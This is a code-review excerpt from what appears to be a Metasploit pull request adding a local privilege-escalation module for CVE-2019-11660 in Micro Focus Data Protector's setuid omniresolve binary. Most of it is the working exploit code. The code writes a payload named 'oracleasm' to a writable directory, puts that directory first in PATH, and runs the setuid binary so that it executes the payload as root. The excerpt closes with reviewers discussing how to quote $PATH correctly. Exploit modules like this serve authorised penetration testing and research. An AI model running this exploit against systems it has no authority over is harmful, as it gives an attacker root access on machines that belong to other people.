modules/exploits/linux/local/omniresolve_suid_priv_esc.rb

```diff
@@ -0,0 +1,124 @@
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          's7u55', # Discovery and Metasploit module
+        ],
+      'DisclosureDate' => '2019-09-13',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [
+            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+            upper_version: Gem::Version.new('10.40')
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-11660' ],
+          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH'].to_s
+  end
+
+  def check
+    unless setuid? suid_bin_path
+      print_error('Executable is not setuid')
+      return CheckCode::Safe
+    end
+
+    info = cmd_exec("#{suid_bin_path} -ver").to_s
+    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+      version = '%.2f' % $1.to_f
+      build = $3.to_i
+      unless Gem::Version.new(version) < target[:upper_version] ||
+             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
+        print_error("omniresolve version #{version} build #{build} is not vulnerable")
+        return CheckCode::Safe
+      end
+    else
+      print_error("Could not parse omniresolve -ver output")
+      return CheckCode::Appears
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable")
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, "Session already has root privileges. Set ForceExploit to override.")
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    @payload_path = File.join(base_dir, "oracleasm")
+    register_file_for_cleanup(@payload_path)
+    write_file(@payload_path, generate_payload_exe)
+    chmod(@payload_path)
+
+    @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    register_file_for_cleanup(@trigger_path)
+    cmd_exec("echo dead:beef > #{@trigger_path}")
+    cmd_exec("env PATH=#{base_dir}:$PATH #{suid_bin_path} -i #{@trigger_path}")
```

Comment:
`$PATH` should probably be quoted.

```suggestion
    cmd_exec("env PATH=#\"{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path}")
```

Reply:
Sure.
I think you've mistyped:
```
=\"#{base_dir}
```

Reply:
> I think you've mistyped

Yup